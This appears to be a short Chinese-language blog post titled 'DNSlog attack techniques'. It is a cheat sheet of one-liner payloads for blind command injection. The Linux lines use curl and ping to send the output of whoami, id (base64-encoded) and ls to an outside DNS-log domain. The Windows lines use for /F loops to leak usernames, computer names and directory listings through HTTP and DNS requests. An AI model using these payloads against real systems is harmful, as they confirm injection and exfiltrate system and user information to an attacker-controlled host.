DNSlog攻击技巧

  • 内容
  • 相关

DNSlog攻击技巧

标签:

分类:网络安全

评论:0条

更新日期:2018-2-28

观看次数:537次

剧情介绍

linux: curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls这类多个输出的命令,直接使用脚本; for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done; windows: 利用HTTP请求: for /F %x in ('whoami') do start http://xxx.dnslog.link/%x 将结果使用默认浏览器弹出; 利用DNS请求: 获取计算机名:for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 获取用户名:for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 不能编码输出,但利用powershell可以实现; dir有/b参数,不显示修改日期等信息,只显示文件名,所以可以弹出; for /F %x in ('dir /b C:\') do start http://xxx.dnslog.link/[%x].jpg

播放地址

本文标签:

版权声明:若无特殊注明,本文皆为《admin》原创,转载请保留文章出处。

百度已收录

本文链接:DNSlog攻击技巧 - https://blog.56jr.cn/WangLuo/65.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知

大家都在搜

00:00 / 00:00
顺序播放